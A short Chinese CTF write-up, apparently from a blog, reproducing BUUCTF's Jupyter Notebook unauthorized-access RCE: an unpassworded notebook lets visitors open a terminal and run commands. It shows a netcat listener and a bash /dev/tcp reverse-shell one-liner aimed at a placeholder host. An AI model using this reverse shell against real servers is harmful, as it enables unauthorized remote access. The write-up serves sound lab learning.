当前位置:网站首页>buuctf [Jupyter]notebook-rce
buuctf [Jupyter]notebook-rce
2022-06-10 12:47:00 【exploitsec】
Jupyter Notebook 未授权访问漏洞
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多加粗样式种编程语言。
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
复现
在Terminal 创建控制台处可以执行任意命令
env打印环境变量
反弹shell
# 本机监听
nc -lvp 5555
# 目标执行
bash -i >& /dev/tcp/x.x.x.x/5555 0>&1
边栏推荐
- Mr developed by unity3d realizes model occlusion and transparent ground receiving shadow
- Error:top-left corner pixel must be either opaque white or transparent.
- CF894C Marco and GCD Sequence
- 线性动态规划专讲
- OFFICE技术讲座:标点符号-英文-大全
- 汇编语言入门-总结
- "Reduce the burden" so that the "pig" can fly higher
- 日本版arXiv凉得一批:2个多月了,才收到37篇论文
- Which EDA design software should Altium Allegro pads choose
- 'getWidth()' is deprecated,'getHeight()' is deprecated
猜你喜欢
GNN is used as the new backbone of the three major tasks of CV, with the same cost performance as CNN, Vit and MLP | Chinese Academy of Sciences & Huawei Noah open source
Unity3d uses URP rendering pipeline to realize ar shadow (shadow casting and transparent ground)
apache atlas 快速入门
Vdo-slam: a visual dynamic object aware slam system paper reading
3. 网页开发工具 VS Code
10 competitive airpods Pro products worth your choice
The deep neural network classifies nearly 2billion images per second, and the new brain like optical classifier chip is on nature
出海企业遇瓶颈 茄子科技(SHAREit Group)有话说
【Multisim仿真】差分放大电路2
Introduction of Altium Designer
随机推荐
[mobile robot] principle of wheel odometer
3. 网页开发工具 VS Code
Asynchronous export of Excel
10、 Application of state machine model (cellular automata; gdb/rr/perf; code verification tool)
MYSQL 主库操作大表DDL ,从库崩溃与系统参数错误设置
线性动态规划专讲
Can qiniu open an account? Is it safe to open an account in qiniu
Unity3d uses URP rendering pipeline to realize ar shadow (shadow casting and transparent ground)
TIDB 初級課程體驗 8 (集群的管理維護, 添加一個TIKV節點)
Comprehensive training of large projects
【Spark】(task8)SparkML中的pipeline通道建立
#yyds干货盘点# 解决剑指offer:跳台阶扩展问题
Start with interpreting the code automatically generated by BDC, and explain the trial version of the program components of sapgui
Error:top-left corner pixel must be either opaque white or transparent.
Comparison of two BigDecimal data types, addition, subtraction, multiplication and division, and formatting
从解读 BDC 自动生成的代码谈起,讲解 SAPGUI 的程序组成部分试读版
"Reduce the burden" so that the "pig" can fly higher
[Accessibility] Missing contentDescription attribute on image
常见的自动化测试框架有哪些?上海软件测试公司安利
性能测试方案(计划)模板